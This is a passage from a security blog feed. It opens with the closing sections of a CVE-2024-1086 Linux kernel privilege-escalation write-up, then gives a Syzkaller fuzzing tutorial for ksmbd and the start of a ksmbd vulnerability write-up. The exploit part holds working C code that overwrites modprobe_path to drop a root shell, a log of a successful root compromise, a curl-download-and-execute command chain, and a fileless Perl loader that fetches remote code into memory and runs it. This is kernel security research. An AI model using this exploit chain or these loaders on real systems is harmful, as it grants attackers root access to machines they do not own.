Codeblock 5.1.4.1: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it overwrites the modprobe_path kernel variable.

5.1.5. Dropping root shell

In order to drop a root shell, we execute a file with an unknown binfmt using modprobe_trigger_memfd(), which takes advantage of the overwritten modprobe_path. The new modprobe_path points to the script (/proc/<pid>/fd/<fd>) below. The script writes 1 to the newly allocated status file descriptor, which makes the exploit detect a successful root shell and stop further bruteforcing. Then, it gives a shell to the console.

In order to universally drop a root shell - without making assumptions about namespaces, and keeping it fileless - I "hijack" the stdin and stdout file descriptors from the exploit and forward them to the root shell. This works on local machines, as well as reverse shells. Essentially - without file redirection functionality - the script runs:

#!/bin/sh
echo -n 1 > /proc/<exploit_pid>/fd/<status_fd>
/bin/sh 0</proc/<exploit_pid>/fd/0 1>/proc/<exploit_pid>/fd/1 2>&1

Codeblock 5.1.5.1: The shell script executed as root, which reports success to the exploit and gives the user a shell.

static void modprobe_trigger_memfd()
{
	int fd;
	char *argv_envp = NULL;

	fd = memfd_create("", MFD_CLOEXEC);
	write(fd, "\xff\xff\xff\xff", 4);

	fexecve(fd, &argv_envp, &argv_envp);
	
	close(fd);
}


static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ...

	// run this script instead of /sbin/modprobe
	int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
	int status_fd = memfd_create("", 0);

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			// scan 40 * 0x200000 (2MiB) = 0x5000000 (80MiB) bytes from kernel base for modprobe path. if not found, just search for another kernel base
			for (int i=0; i < 40; i++) 
			{
				for (pid_t pid_guess=0; pid_guess < 65536; pid_guess++)
				{
					int status_cnt;
					char buf;

                    // ... (overwrite modprobe_path)

					// run custom modprobe file as root, by triggering it by executing file with unknown binfmt
					// if the PID is incorrect, nothing will happen
					modprobe_trigger_memfd();

					// indicates correct PID (and root shell). stops further bruteforcing
					status_cnt = read(status_fd, &buf, 1);
					if (status_cnt == 0)
						continue;

					printf("[+] successfully breached the mainframe as real-PID %u\n", pid_guess);

					return;
				}

				printf("[!] verified modprobe_path address does not work... CONFIG_STATIC_USERMODEHELPER enabled?\n");

				return;
			}
			
			printf("[-] failed to find correct modprobe_path: trying to find new kernel base...\n");
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

Codeblock 5.1.5.2: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it triggers the modprobe_path mechanism.

5.1.6. Post-exploit stability

As a byproduct of our memory shenanigans, the pagetable pages for the exploit process are a tad unstable. Fortunately, this only becomes a problem when the process stops, so we can solve it by not making it stop. :^)

We do this using a simple sleep() call, which unfortunately makes the TTY of the user sleep as well, since the process is sleeping in the foreground. To circumvent this, we make the exploit spawn a child process which performs the actual exploit, and make the parent exit when it is semantically supposed to.

Additionally, we register a SIGINT signal handler in the child, which will handle (among other things) keyboard interrupts by making the child process sleep in the background. The parent is not affected, as the handler is only set in the child process.

Notice that we cannot use wait() as the child processes will remain running in the background.

int main()
{
	int *exploit_status;

	exploit_status = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	*exploit_status = EXPLOIT_STAT_RUNNING;

	// detaches program and makes it sleep in background when succeeding or failing
	// - prevents kernel system instability when trying to free resources
	if (fork() == 0)
	{
		int shell_stdin_fd;
		int shell_stdout_fd;

		signal(SIGINT, signal_handler_sleep);

		// open copies of stdout etc which will not be redirected when stdout is redirected, but will be printed to user
		shell_stdin_fd = dup(STDIN_FILENO);
		shell_stdout_fd = dup(STDOUT_FILENO);

#if CONFIG_REDIRECT_LOG
		setup_log("exp.log");
#endif

		setup_env();
 
		privesc_flh_bypass_no_time(shell_stdin_fd, shell_stdout_fd);

		*exploit_status = EXPLOIT_STAT_FINISHED;

		// prevent crashes due to invalid pagetables
		sleep(9999);
	}

	// prevent premature exits
	SPINLOCK(*exploit_status == EXPLOIT_STAT_RUNNING);

	return 0;
}

Codeblock 5.1.6.1: A part of the main() exploit function written in C, which sets up the child processes and waits until the exploit is done.

5.1.7. Running it

For KernelCTF, I ran the exploit using cd /tmp && curl https://secret.pwning.tech/<gid> -o ./exploit && chmod +x ./exploit && ./exploit. This takes advantage of the writable /tmp directory on the target machine. This was before I realized I could presumably execute the exploit filelessly with Perl. Finally, after months of work, we are rewarded with:

user@lts-6:/$ id
uid=1000(user) gid=1000(user) groups=1000(user)

user@lts-6:/$ curl https://cno.pwning.tech/aaaabbbb-cccc-dddd-eeee-ffffgggghhhh -o /tmp/exploit && cd /tmp && chmod +x exploit && ./exploit
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  161k  100  161k    0     0   823k      0 --:--:-- --:--:-- --:--:--  823k

[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[*] waiting for the calm before the storm...
[*] sending double free buffer packet...
[*] spraying 16000 pte's...
[   13.592791] ------------[ cut here ]------------
[   13.594923] WARNING: CPU: 0 PID: 229 at mm/slab_common.c:985 free_large_kmalloc+0x3c/0x60
...
[   13.746361] ---[ end trace 0000000000000000 ]---
[   13.748375] object pointer: 0x000000003d8afe8c
[*] checking 16000 sprayed pte's for overlap...
[+] confirmed double alloc PMD/PTE
[+] found possible physical kernel base: 0000000014000000
[+] verified modprobe_path/usermodehelper_path: 0000000016877600 ('/sanitycheck')...
[*] overwriting path with PIDs in range 0->4194304...
[   14.409252] process 'exploit' launched '/dev/fd/13' with NULL argv: empty string added
/bin/sh: 0: can't access tty; job control turned off
root@lts-6:/# id
uid=0(root) gid=0(root) groups=0(root)

root@lts-6:/# cat /flag
kernelCTF{v1:mitigation-v3-6.1.55:1705665799:...}

root@lts-6:/# 

Codeblock 5.1.7.1: An exploit log for an exploitation attempt on the KernelCTF, leading to a root shell.

Practically speaking, the user could copy/paste the PID from the kernel warning into the exploit stdin when working with KernelCTF remote instances, but I wanted to bruteforce PIDs so my exploit works on other infrastructure as well.

The exploit supports fileless execution when the target has perl installed. This is nice when the target filesystem is read-only. It works by setting modprobe_path to /proc/<exploit_pid>/fd/<target_script> among other things.

perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  open(my $fh, ">&=".$fd);
  print $fh `curl https://example.com/exploit -s`;
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Codeblock 5.1.7.2: An exploit bootstrap script in Perl, which executes the exploit without writing to disk (fileless-execution).

5.2. Source code

The exploit source code can be found in my CVE-2024-1086 PoC repository. As with all of my software projects, I tried to focus on developer experience as well. Hence, the exploit source code has been split across several files for the separation of concerns, and only the functions which should be called in other files are exported (put inside of the .h file) whilst all other functions are marked static. This is much like the public/private attributes of OOP languages. 

Additionally, I decided to make the exploit crash/exit instead of properly returning errors when an error occurs. I did this since there is no added value in returning error codes: the exploit's purpose is to be a stand-alone binary, not a library. Hence, if one decides for whatever reason to embed these functions into a library, they should, semantically speaking, make the functions return error codes instead.

If I'm missing any important semantics, feel free to send me a DM (using contact details at the bottom of this blogpost).

5.3. Compiling the exploit

5.3.1. Dependencies

The exploit has 2 dependencies: libnftnl-dev and libmnl-dev. Libmnl parses and constructs netlink headers, whilst libnftnl presumably constructs netfilter-like objects for the user such as chains and tables, and serializes them to netlink messages for libmnl. This is a powerful combination which allows the user to do pretty much anything required for the exploit.

Regretfully, I had to do a bit of tweaking for the exploit. In the exploit repository, I have added .a (ar archive) files for the libraries compiled with musl-gcc; an ar archive is essentially a .zip of object files which the compilers understand. This allows for statically linking the libraries with musl-gcc. I had to download a separate libmnl-dev version, but this is covered in a section below. Fortunately for the end-user, this means they do not have to install the libraries separately.

5.3.2. Makefile

To statically compile the exploit for KernelCTF, I used the following makefile:

SRC_FILES := src/main.c src/env.c src/net.c src/nftnl.c src/file.c
OUT_NAME = ./exploit

# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
#   and dynamically linking raised glibc ABI versioning errors
CC = musl-gcc

# use custom headers with fixed versions in a musl-gcc compatible manner
# - ./include/libmnl: libmnl v1.0.5
# - ./include/libnftnl: libnftnl v1.2.6
# - ./include/linux-lts-6.1.72: linux v6.1.72
CFLAGS = -I./include -I./include/linux-lts-6.1.72 -Wall -Wno-deprecated-declarations

# use custom object archives compiled with musl-gcc for compatibility. normal ones 
#   are used with gcc and have _chk funcs which musl doesn't support
# the versions are the same as the headers above
LIBMNL_PATH = ./lib/libmnl.a
LIBNFTNL_PATH = ./lib/libnftnl.a

exploit: _compile_static _strip_bin
clean:
	rm $(OUT_NAME)


_compile_static:
	$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)
_strip_bin:
	strip $(OUT_NAME)

Codeblock 5.3.2.1: The Makefile used to statically compile the exploit.

5.3.3. Static compilation remarks & errors

This section is just for troubleshooting, for people who try to static-compile their own exploits.

5.3.3.1. Libmnl not found

One of the issues when living the easy life with apt and compiling with gcc was that libmnl-dev - one of the libraries containing the netlink functions - has an invalid .a file in the Debian stable repository at the time of writing. When trying to compile statically, this will look like:

/usr/bin/ld: cannot find -lmnl: No such file or directory 
collect2: error: ld returned 1 exit status 
make: *** [Makefile:17: _compile_static] Error 1

Codeblock 5.3.3.1.1: Shell stderr output containing a linking error about being unable to resolve libmnl.

To fix this, please install the libmnl package which is currently in the unstable repository: sudo apt install libmnl-dev/sid (*/sid installs the package from the Debian unstable repo).

Otherwise, just clone the libmnl repository and compile the library yourself with gcc, and create the .a file yourself.

5.3.3.2. Invalid opcodes - AVX fun

The last issue I experienced when compiling the exploit statically using gcc with glibc was the use of unsupported instructions - specifically unsupported AVX(512) instructions, observed by opening the binary in Ghidra and looking at the RIP address. The x86 extension AVX512 adds instructions which use the bigger registers supported by server CPUs. Usually, gcc polls the CPU it is running on (i.e. using CPUID) to determine which instructions it can emit. However, I was compiling the exploit in a QEMU VM with the -cpu host argument set, on my Intel Xeon CPU which supports AVX512.

The issue is that QEMU - at least in that version - does not support AVX512 extensions. So 50% of the time the exploit would raise a CPU trap in QEMU due to unsupported opcodes (instructions). The reason these instructions were executed is yet another rabbit hole.

[   15.211423] traps: exploit[167] trap invalid opcode ip:433db9 sp:7ffcb0682ee8 error:0 in exploit[401000+92000]

Codeblock 5.3.3.2.1: Dmesg output containing an invalid opcode error (CPU trap).

I solved this by simply removing the -cpu host argument of the QEMU VM and compiling the exploit in that VM: the VM would then use the actual CPU properties that QEMU supports, and gcc would no longer emit AVX512 instructions, considering CPUID no longer advertises AVX512 support.

Sadly enough, the KernelCTF instances always have the -cpu host argument enabled. Fortunately, the KernelCTF community told me I needed to statically compile the exploit with musl-gcc instead, since glibc is not made for static compilation.

6. Discussion

6.1. The double-free methods

In this blogpost, I present 2 methods to allocate an order==0 page and an order==4 page at the same address: draining the PCP lists, and the race condition. The former made the latter obsolete, because it does not depend on a race condition.

The race condition method only works properly for VMs with emulated serial TTYs (i.e. not virtio-serial), because the race condition window is too small on physical systems (~1ms instead of 50ms-300ms). Fortunately enough, this delay was 300ms for KernelCTF and hence allowed me to use this method.

I was not satisfied with the quality and stability of this method, so I refined the exploit for longer than a month, and (among other improvements) came up with the 2nd method: draining the PCP list to allocate pages from the buddy-allocator.

When I started writing the exploit, I was not familiar with the internals of the buddy allocator and the PCP allocator. Only after investigating the internals of the allocators did I understand how I could properly abuse them for the exploit. Hence, one of the biggest lessons I have internalized is to fully understand something before trying to abuse it, because it always pays off.

6.2. Post-exploitation stability

Because the proof-of-concept exploit in this blogpost utilizes an sk_buff double-free, and has to deal with corrupted skb's, we have to deal with noise in the freelist whenever network activity happens. When a packet is transmitted or received, skb's are allocated from and deallocated to the freelist. Currently, we try to minimize this by disabling stdout around double-free time, which helps when the exploit is running over SSH or a reverse shell.

However, on some hardware systems (like Debian in the hardware setup table), the exploit still manages to crash the system after a few seconds. I have not looked into this, but I suspect this may be because the hardware-based test devices are laptops and therefore have WiFi adapters. Because WiFi frames (which may not even be targeted at the device) are also skb's, a WiFi-connected device on a high-usage WiFi network (such as the test devices) may be unstable. When the WiFi adapter is disabled in the BIOS, the exploit runs fine, which supports this theory.

If a researcher wants to increase the stability of the exploit post-exploitation, they would probably want to either manipulate the SLUB allocator to make the corrupted skb unavailable, or use Dirty Pagedirectory to fix this matter.

7. Mindset & Signing Off

7.1. VR mindset

While tackling this project, I focused on three key objectives: ensuring broad compatibility, resilient stability, and covert execution. In essence, it culminated in a highly-capable kernel privilege-escalation exploit. Additionally, I tried to keep the codebase as elegant as possible, utilizing my software engineering background.

This meant that on top of the 2-month development period, there were 2 months for refining the exploit for high stability and compatibility. I decided to take this path since I wanted to demonstrate my technical capabilities in this blogpost (and to challenge myself).

This meant thinking differently: I needed to abuse intended, data-only behaviour in subsystems which would be broadly available. This is reflected in the exploit techniques, because I only make use of the IPv4 subsystem and virtual memory, which are enabled on nearly all kernel builds. In fact, most work for the exploit was put into hitting specific codepaths (e.g. the packet being sent from 1.1.1.1 to 255.255.255.255) and making it elegant.

Additionally, I'm not exploiting any slab-allocator behaviour for the exploit itself: just for masking sk_buff objects, and for the initial kmalloc/kfree calls which are passed down to the page allocators. Because of this, the exploit is not affected by slab-allocator behaviour, which tends to change across versions due to new mitigations like random kmalloc caches. Unfortunately, the initial bug requires unprivileged user namespaces and nftables. The other techniques - like Dirty Pagedirectory and PCP draining - should work regardless of this, and hence can be used for real-world exploits.

7.2. Reflection

I had great fun researching the bug and exploitation techniques, and was really invested in making the exploit work. Never had I ever gotten so much joy developing a project, specifically when dropping the first root shell with the bug. Additionally, I have learned a great deal about the networking subsystem of the Linux kernel (from nftables to IP fragmentation to IP handling code) and the memory management subsystem (from allocators to pagetables).

Of all my experiences in the IT field - ranging from software engineering to network engineering to security engineering - this was by far the most joyful project, and it gave me one of the biggest challenges I have encountered yet.

Additionally, it gave me inspiration for other projects which I want to develop and publish to contribute to the community. But until they are ready to be revealed to the world, they shall remain in the dark. :^)

7.3. Credits

I'd like to thank the following people for contributing to the blogpost in various ways:

  • @ky1ebot (Twitter/X): extensive peer-review.
  • @daanbreur (Github): assistance with diagram colorscheme.

Additionally, I tried to link every blogpost/article/etc I utilized in the relevant sections. If you believe I reused your technique without credits, please reach out to me, and I will link your blogpost in the relevant section.

7.4. Signing off

Thank you for reading, it's been an honor to present this article.

For professional inquiries, please contact notselwyn@pwning.tech (PGP key) as I would love to discuss options and ideas. For other shenanigans, please don't be afraid to slide into my Twitter DMs over at @notselwyn.

Notselwyn‌‌
March 2024

]]>
<![CDATA[Tickling ksmbd: fuzzing SMB in the Linux kernel]]>https://pwning.tech/ksmbd-syzkaller/658f44f8d32e980001de21f4Sat, 16 Sep 2023 13:48:24 GMTThis blogpost is the next installment of my series of hands-on no-boilerplate vulnerability research blogposts, intended for time-travelers in the future who want to do Linux kernel vulnerability research. In this blogpost I'm discussing adding pseudo-syscalls and struct definitions for ksmbd to Syzkaller, setting up a working ksmbd instance, and patching ksmbd in order to collect KCOV. Let's dive in!

1. What are Syzkaller and KCOV?

Syzkaller is an unsupervised coverage-guided kernel fuzzer, or put differently: it throws generated input at a kernel (through system calls, network packets, et cetera) based on educated-guesses in order to find bugs in that kernel. Syzkaller has builtin support for several kernels, such as Windows, Linux and OpenBSD. A full list can be found in Syzkaller's Github repository.

Syzkaller partially bases its prioritization on KCOV (kernel coverage) since it assumes that more coverage = more bugs. For a full explanation of Syzkaller and KCOV please refer to the "Collecting network coverage — KCOV" and "Integrating into syzkaller" sections of the "Looking for Remote Code Execution bugs in the Linux kernel" blogpost by Xairy.io in order to deduplicate content and keep this blogpost as technical as possible.

2. Adding Syzkaller definitions for ksmbd

In order to make Syzkaller generate input in an efficient manner, we need to give it the structure of the input. For ksmbd, those inputs are SMB requests, and hence we need to provide Syzkaller with the structures of SMB requests. The file with my unauthenticated ksmbd definitions can be found here: ksmbd.txt.

The syntax for declaring Syzkaller structures and pseudo-syscalls is quite straightforward and well documented in their Github repository. For ksmbd, you can simply copy ksmbd.txt to sys/linux/ksmbd.txt in the Syzkaller repository and Syzkaller will automatically index it. When defining Syzkaller structures, you should emulate the real data as tightly as possible. Hence, please note that the structures are marked as [packed], which means that Syzkaller should not add any padding to the structure, as that would ruin the validity of the SMB request.
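As a hypothetical, heavily abbreviated illustration of the syntax (the real, complete definitions live in ksmbd.txt), a packed struct and a pseudo-syscall declaration look roughly like this:

```
# Abbreviated sketch, not the real ksmbd.txt definitions
smb2_hdr_sketch {
	ProtocolId	const[0x424d53fe, int32]	# 0xFE 'S' 'M' 'B', little-endian
	StructureSize	const[64, int16]
} [packed]

syz_ksmbd_send_req(req ptr[in, array[int8]], reqlen len[req], rsp ptr[out, array[int8]], rsplen len[rsp])
```

Without [packed], Syzkaller would be free to insert padding between fields, producing byte layouts that ksmbd's parser rejects.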

However, defining Syzkaller pseudo-syscalls is not as well documented. In order to define your own pseudo-syscalls, you need to define the functions in executor/common_linux.h in the Syzkaller repository. The code I added for sending the requests is (with explanation below):

#if SYZ_EXECUTOR || __NR_syz_ksmbd_send_req
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

#define KSMBD_BUF_SIZE 16000

static long syz_ksmbd_send_req(volatile long a0, volatile long a1, volatile long a2, volatile long a3)
{
	int sockfd;
	int packet_reqlen;
	int errno;
	struct sockaddr_in serv_addr;
	char packet_req[KSMBD_BUF_SIZE]; // max frame size

	debug("[*]{syz_ksmbd_send_req} entered ksmbd send...\n");

	if (a0 == 0 || a1 == 0) {
		debug("[!]{syz_ksmbd_send_req} param empty\n");
		return -7;
	}

	sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sockfd < 0) {
		debug("[!]{syz_ksmbd_send_req} failed to create socket\n");
		return -1;
	}

	memset(&serv_addr, '\0', sizeof(serv_addr));
	serv_addr.sin_family = AF_INET;
	serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	serv_addr.sin_port = htons(445);

	errno = connect(sockfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
	if (errno < 0) {
		debug("[!]{syz_ksmbd_send_req} failed to connect (err: %d)\n", errno);
		return errno ^ 0xff80000;
	}

	// prepend kcov handle to packet
	packet_reqlen = a1 + 8 > KSMBD_BUF_SIZE ? KSMBD_BUF_SIZE - 8 : a1;
	*(unsigned long*)packet_req = procid + 1;
	memcpy(packet_req + 8, (char*)a0, packet_reqlen);

	if (write(sockfd, (char*)packet_req, packet_reqlen + 8) < 0)
		return -4;

	if (read(sockfd, (char*)a2, a3) < 0)
		return -5;

	if (close(sockfd) < 0)
		return -6;

	debug("[+]{syz_ksmbd_send_req} successfully returned\n");

	return 0;
}
#endif

C source-code for syz_ksmbd_send_req: a custom pseudo-syscall

The function prepends the process ID of the currently running syz-executor to a TCP packet, sends the TCP packet (i.e. an SMB request) to 127.0.0.1:445 and receives a TCP packet (i.e. an SMB response). Prepending the process ID to the packet has to do with KCOV and will be explained in section 4.

The psuedo-syscall can be exclusively whitelisted using the following value in the Syzkaller config (the full config can be found in section 5):

{
	// ...
	"enable_syscalls": [
		"syz_ksmbd_send_req"
	],
	// ...
}

A snippet of the "enable_syscalls" key in the Syzkaller config

3. Setting up ksmbd

In order to interact with ksmbd, we need to send SMB packets to 127.0.0.1:445. However, when the executor tries this, it will not be able to reach ksmbd for two reasons:

  1. Ksmbd needs to be started from userland
  2. Networking namespaces prevent access

In order to start the ksmbd TCP server in the kernel, we need to kickstart it using the userland toolset. Specifically, we need to set up an SMB user and run the command that starts the ksmbd server. In order to be able to interact with ksmbd in Syzkaller VMs, we need to run those commands in every VM at boot-time. I solved this by creating a systemd service, which runs a script that kickstarts ksmbd.

[Unit]
Description=Ksmbd
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
Group=root
ExecStart=/root/start_ksmbd.sh

[Install]
WantedBy=multi-user.target

/etc/systemd/system/ksmbd.service: an INI-style unit file describing a systemd service

#!/usr/bin/env bash

ksmbd.addshare --add-share=files --options="path = /tmp 
read only = no"
ksmbd.adduser -a user -p password
ksmbd.mountd -n

/root/start_ksmbd.sh: a simple shell script that kickstarts ksmbd by running several commands

After enabling the service, it should be possible to connect to ksmbd using nc 127.0.0.1 445 -v.

Lastly, Syzkaller enables networking namespaces by default. The ksmbd service only works on 127.0.0.1:445 in the root-namespace, so the syz-executor instances will not be able to connect to ksmbd since they run in their own namespaces. To bypass this feature, I patched the Syzkaller source-code to avoid creating a network namespace:

static int do_sandbox_none(void)
{
    // [snip]
#if SYZ_EXECUTOR || SYZ_NET_DEVICES
    initialize_netdevices_init();
#endif
+   /*
    if (unshare(CLONE_NEWNET)) {
        debug("unshare(CLONE_NEWNET): %d\n", errno);
    }
+   */
    // Enable access to IPPROTO_ICMP sockets, must be done after CLONE_NEWNET.
    write_file("/proc/sys/net/ipv4/ping_group_range", "0 65535");
+   /*
#if SYZ_EXECUTOR || SYZ_DEVLINK_PCI
    initialize_devlink_pci();
#endif
    // [snip]
#if SYZ_EXECUTOR || SYZ_NET_DEVICES
    initialize_netdevices();
#endif
+   */
#if SYZ_EXECUTOR || SYZ_WIFI
    initialize_wifi_devices();
#endif
    setup_binderfs();

+   /*
    int netns = open("/proc/1/ns/net", O_RDONLY);
    // [snip]
    close(netns);
+   */

    loop();
    doexit(1);
}
#endif

Now, the syz-executor instances run in the (same) root-namespace which means that the ksmbd service is available at 127.0.0.1:445 for syz-executor instances.

4. Adding KCOV support to ksmbd

When we try to fuzz ksmbd using the Syzkaller setup demonstrated above in section 2 and section 3, we will notice that the Syzkaller coverage page does not show any coverage in ksmbd, even though we get valid SMB responses. As a result, Syzkaller will not prioritize input based on the amount of ksmbd code reached and the compared request values. We do not get any KCOV because the execution flow of sending our SMB request starts at sys_send() and passes through the networking stack, where soft interrupt requests (softirq's) handle sending and receiving the packet. Because interrupt contexts do not have a process context assigned, they do not support KCOV and coverage tracking stops. Therefore, we need to either:

  1. Patch the networking subsystem to not use softirq's
  2. Patch ksmbd to use remote KCOV

I started out trying to patch the networking subsystem because I did not know about remote KCOV, but I ended up giving up due to the complexity of the networking subsystem. Hence, that left me exploring the web for alternatives: enter remote KCOV.

Remote KCOV allows you to (re)start KCOV using an identifier which the KCOV collector (like syz-fuzzer) uses to assign certain coverage to a certain process (like syz-executor). Specifically, syz-fuzzer uses the syz-executor instance PID as the KCOV identifier, so we need to pass our process ID to ksmbd per connection. Luckily, we can prepend the PID to our SMB packet in syz-executor without ugly side effects due to the way ksmbd works with sockets: we can execute a simple read(sock_fd, &pid, 8) call at the start of the TCP connection handler to acquire the process ID in ksmbd. The codeblocks below contain patches for starting remote KCOV (explanation below):

struct ksmbd_conn {
    // [snip]

+   unsigned long         kcov_handle;
};

C source-code containing a patch for the struct ksmbd_conn

int ksmbd_conn_handler_loop(void *p)
{
    struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
    struct ksmbd_transport *t = conn->transport;
    unsigned int pdu_size, max_allowed_pdu_size;
    char hdr_buf[4] = {0,};
    int size;

    // [snip]

    if (t->ops->prepare && t->ops->prepare(t))
        goto out;

+   size = t->ops->read(t, (char*)&conn->kcov_handle, sizeof(conn->kcov_handle), -1);
+   if (size != sizeof(conn->kcov_handle))
+       goto out;
+
+   kcov_remote_start(conn->kcov_handle);

    conn->last_active = jiffies;
    while (ksmbd_conn_alive(conn)) {
        // [snip]
    }

+   kcov_remote_stop();

out:
    // [snip]
    return 0;
}

C source-code containing a patch for the function ksmbd_conn_handler_loop()

static void handle_ksmbd_work(struct work_struct *wk)
{
    struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
    struct ksmbd_conn *conn = work->conn;

+   kcov_remote_start(conn->kcov_handle);
    atomic64_inc(&conn->stats.request_served);
    
    __handle_ksmbd_work(work, conn);

    // [snip]

+   kcov_remote_stop();
}

C source-code containing a patch for the function handle_ksmbd_work()

As you can see, we add the kcov_handle property to struct ksmbd_conn to keep track of the KCOV identifier throughout the process of handling an SMB request. Secondly, when a TCP connection gets accepted (and ksmbd_conn_handler_loop gets called) we instantly read the first 8 bytes into kcov_handle, after which the rest of the code will not notice anything with regards to the prepended data. However, ksmbd_conn_handler_loop itself defers SMB requests within the TCP session, so we lose KCOV yet again. Hence, we need to start KCOV again in handle_ksmbd_work, which is called for each SMB-request-related TCP packet. Luckily, we saved kcov_handle in struct ksmbd_conn, so we can easily access it to restart KCOV.

5. Testing it

We can recompile syzkaller using:

make generate -j`nproc`  # generate headers containing our pseudo-syscall
make -j`nproc`  # build binaries

Linux shell commands

The config I used for fuzzing (it should be ironed out per system):

{
	"target": "linux/amd64",
	"http": "0.0.0.0:56741",
	"workdir": "workdir",
	"kernel_obj": "./linux-v6.4-patched",
	"image": "./image/bullseye.img",
	"sshkey": "./image/bullseye.id_rsa",
	"syzkaller": "/opt/syzkaller",
	"procs": 16,
	"type": "qemu",
	"sandbox": "none",
	"enable_syscalls": [
		"syz_ksmbd_send_req"
	],
	"vm": {
		"count": 24,
		"kernel": "./linux-v6.4-patched/arch/x86/boot/bzImage",
		"cpu": 1,
		"cmdline": "net.ifnames=0 oops=panic panic_on_warn=1 panic_on_oops=1",
		"mem": 2048
	}
}

A json datastructure containing configuration values for Syzkaller

When testing the Syzkaller and ksmbd setups demonstrated above, everything should run smoothly without any nasty errors or bugs. While using Syzkaller with the config above, I found 4 unique bugs in a Linux 6.4 release:

The Syzkaller dashboard containing 4 unique bugs (3 times out-of-bounds read and 1 use-after-free write)

6. Conclusion

I'm satisfied with how the fuzzer turned out as it allows me to fuzz unauthenticated SMB requests, but there's still a long way to go to improve the QoL of (ksmbd) fuzzing:

  1. Extending the SMB request definitions to support more commands
  2. Implementing authentication using a pseudo-syscall that returns the session id

Thank you for reading my blogpost, I hope you learned as much as I did researching and writing about these topics. For questions, job inquiries, and other things, please send an email to notselwyn@pwning.tech (PGP key).

]]>
<![CDATA[Unleashing ksmbd: crafting remote exploits of the Linux kernel]]>December 22nd 2022: it's Christmas Thursday, one of the last workdays before the Christmas vacation starts. Whilst everyone was looking forward to opening presents from friends and family, the Zero Day Initiative decided to give the IT community a present as well: immense stress in the form of

]]>
https://pwning.tech/ksmbd/658f44f8d32e980001de21f3Fri, 04 Aug 2023 18:57:34 GMTDecember 22nd 2022: it's Christmas Thursday, one of the last workdays before the Christmas vacation starts. Whilst everyone was looking forward to opening presents from friends and family, the Zero Day Initiative decided to give the IT community a present as well: immense stress in the form of ZDI-22-1690, an unauthenticated RCE vulnerability in the Linux kernel's ksmbd subsystem.

This vulnerability showed me the way to a buggy subsystem of the Linux kernel: ksmbd. Ksmbd stands for Kernel SMB Daemon, which acts as an SMB server (which you may recognize from Windows) in the kernel. SMB is known in the community for its unnecessary complexity and the resulting vulnerabilities. Imagine the reaction of the Linux developer community when ksmbd was being introduced into the kernel.

I wanted to learn more about SMB and the ksmbd subsystem, so I decided to do vulnerability research in this subsystem, with results. In this write-up I will present the exploits and technical analyses behind ZDI-23-979 and ZDI-23-980: a network-based unauthenticated Denial-of-Service, and a network-based (un)authenticated 64KiB Out-of-Bounds read.

An overview of SMB

Server Message Block (SMB) is a file transfer protocol widely used by Windows, where it can be used to access a NAS or another computer over a network. The most important features of SMB are file reads and writes, accessing directory information, and authentication. Since Windows tightly integrates SMB, SMB also supports many authentication mechanisms from the Windows ecosystem: NTLMSSP, Kerberos 5, Microsoft Kerberos 5, and Kerberos 5 user-to-user (U2U). Of course, the kernel also supports normal authentication like regular passwords.

To prevent extensive resource usage (like disk storage and RAM), SMB has a credit system where each command subtracts credits from the session. If the credits reach 0, the session cannot issue more commands.
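The credit rule can be modeled as a toy sketch (illustrative Python only; ksmbd's real credit-granting logic is more involved):

```python
# Toy model of SMB's per-session credit accounting described above
# (illustrative only; ksmbd's real credit granting is more involved).
class SmbSession:
    def __init__(self, credits):
        self.credits = credits

    def issue_command(self, cost=1, granted=0):
        # a session whose credits hit 0 cannot issue further commands
        if self.credits < cost:
            raise PermissionError("session is out of credits")
        self.credits += granted - cost

sess = SmbSession(credits=2)
sess.issue_command()          # ok, 1 credit left
sess.issue_command()          # ok, 0 credits left
try:
    sess.issue_command()      # rejected: no credits remain
except PermissionError as e:
    print(e)                  # prints "session is out of credits"
```

The granted parameter models the server handing out fresh credits in its responses, which is how long-lived sessions keep working.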

N.B. A packet, request and command are different things. The same goes for a session and a connection.

An overview of the definitions of a chained SMB request packet.
An overview of the definitions of an SMB session and connection.

ZDI-23-979: NULL Pointer Dereference Denial-of-Service

ZDI-23-979 is a network-based unauthenticated NULL pointer dereference vulnerability resulting from a logic bug in the session handling of chained SMB request packets. The ksmbd subsystem only handles the session for the first request in the packet, which makes a second request in the packet use the same session instance. However, when the first request does not use a session, the second request consequently does not use a session either, even when it is required.

This could hypothetically result in an auth bypass since it skips the session/auth checks, but instead it leads to a NULL pointer dereference since the handler tries to access properties of the request session.

Let's dive into the function __handle_ksmbd_work of v6.3.9, the last vulnerable kernel release. This function gets called for every packet from a connection. As you can see, the function calls __process_request for every request in the packet, but only checks the session for the first request in the packet using conn->ops->check_user_session(work) (explanation below).

static void __handle_ksmbd_work(struct ksmbd_work *work,
				struct ksmbd_conn *conn)
{
	u16 command = 0;
	int rc;

